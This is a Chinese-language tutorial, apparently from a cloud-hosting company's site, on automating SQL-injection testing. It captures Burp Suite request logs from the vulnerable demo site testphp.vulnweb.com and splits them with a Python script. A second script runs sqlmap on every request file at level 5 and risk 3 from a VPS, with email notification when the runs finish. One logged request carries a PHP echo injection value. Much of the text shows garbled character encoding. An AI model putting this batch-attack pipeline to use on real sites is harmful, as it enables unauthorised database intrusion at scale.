您好,登錄后才能下訂單哦!
本篇內(nèi)容主要講解“sqlmap批量跑的方法是什么”,感興趣的朋友不妨來看看。本文介紹的方法操作簡單快捷,實(shí)用性強(qiáng)。下面就讓小編來帶大家學(xué)習(xí)“sqlmap批量跑的方法是什么”吧!
使用burpsuite的日志記錄功能,開啟這個(gè)功能
你不可能使用開啟proxy日志,因?yàn)槟阒荒苡幸庾R(shí)去篩選注入的數(shù)據(jù)包,所以你在proxy那里攔截到數(shù)據(jù)包之后,發(fā)送到repeater,然后run,才可以記錄日志。
我們拿這個(gè)做測(cè)試站,http://testphp.vulnweb.com/
====================================================== 17:40:30 http://testphp.vulnweb.com:80 [176.28.50.165] ====================================================== POST /guestbook.php HTTP/1.1 Host: testphp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Referer: http://testphp.vulnweb.com/guestbook.php Content-Type: application/x-www-form-urlencoded Content-Length: 45 Connection: close Upgrade-Insecure-Requests: 1 name=anonymous+user&text=1&submit=add+message ====================================================== ====================================================== 17:41:05 http://testphp.vulnweb.com:80 [176.28.50.165] ====================================================== GET /comment.php?aid=1 HTTP/1.1 Host: testphp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Referer: http://testphp.vulnweb.com/artists.php Connection: close Upgrade-Insecure-Requests: 1 ====================================================== ====================================================== 17:41:19 http://testphp.vulnweb.com:80 [176.28.50.165] ====================================================== POST /comment.php HTTP/1.1 Host: testphp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Referer: http://testphp.vulnweb.com/comment.php?aid=1 Content-Type: application/x-www-form-urlencoded Content-Length: 90 Connection: close Upgrade-Insecure-Requests: 1 name=%3Cyour+name+here%3E1&comment=1&Submit=Submit&phpaction=echo+%24_POST%5Bcomment%5D%3B ======================================================
寫了一個(gè)腳本去解析分割
f = open('c:\\1.log','r') n = 0 t = 1 for i in f.readlines(): if i == "======================================================\n": n = n+1 if n==2: if i== "======================================================\n": pass else: with open('d:\\'+str(t)+'.txt','a+') as tmp: tmp.write(i) #print(i) if n==3: n=0 t = t+1 #print(n)
得到了這么多的注入文件
然后將這個(gè)導(dǎo)入到VPS,執(zhí)行下面腳本就可以不用占用自己服務(wù)器的資源。跑完之后有郵件提醒,就可以知道結(jié)果了
import os import subprocess import smtplib from email.mime.text import MIMEText from email.header import Header import time def sql(): for root, dirs, files in os.walk("/opt/sql/", topdown=False): for name in files: path = os.path.join(root, name) cmd = 'python /opt/sqlmap/sqlmap.py -r '+ path +' --batch --dbms=mysql -v 3 --level 5 --risk 3 --skip="Host,User-Agent,Accept-Language,Referer,Cookie," --threads=10 > /opt/result/'+ name +' 2>&1 &' print(cmd) os.system(cmd) def send_email(): # 第三方 SMTP 服務(wù) mail_host = "smtp.163.com" # 設(shè)置服務(wù)器 mail_user = "@163.com" # 用戶名 mail_pass = "" # 口令 sender = '@163.com' receivers = ['@163.com'] # 接收郵件,可設(shè)置為你的QQ郵箱或者其他郵箱 message = MIMEText('完成測(cè)試', 'plain', 'utf-8') message['From'] = Header("test", 'utf-8') message['To'] = Header("test", 'utf-8') subject = '完成測(cè)試' message['Subject'] = Header(subject, 'utf-8') try: smtpObj = smtplib.SMTP() smtpObj.connect(mail_host, 25) # 25 為 SMTP 端口號(hào) smtpObj.login(mail_user, mail_pass) smtpObj.sendmail(sender, receivers, message.as_string()) print "郵件發(fā)送成功" except smtplib.SMTPException: print "Error: 無法發(fā)送郵件" sql() while True: result = int(os.popen('ps aux | grep sqlmap | wc -l ').read()) print(result) print(type(result)) if result < 3 : send_email() break else: time.sleep(10)
到此,相信大家對(duì)“sqlmap批量跑的方法是什么”有了更深的了解,不妨來實(shí)際操作一番吧!這里是億速云網(wǎng)站,更多相關(guān)內(nèi)容可以進(jìn)入相關(guān)頻道進(jìn)行查詢,關(guān)注我們,繼續(xù)學(xué)習(xí)!
免責(zé)聲明:本站發(fā)布的內(nèi)容(圖片、視頻和文字)以原創(chuàng)、轉(zhuǎn)載和分享為主,文章觀點(diǎn)不代表本網(wǎng)站立場(chǎng),如果涉及侵權(quán)請(qǐng)聯(lián)系站長郵箱:is@yisu.com進(jìn)行舉報(bào),并提供相關(guān)證據(jù),一經(jīng)查實(shí),將立刻刪除涉嫌侵權(quán)內(nèi)容。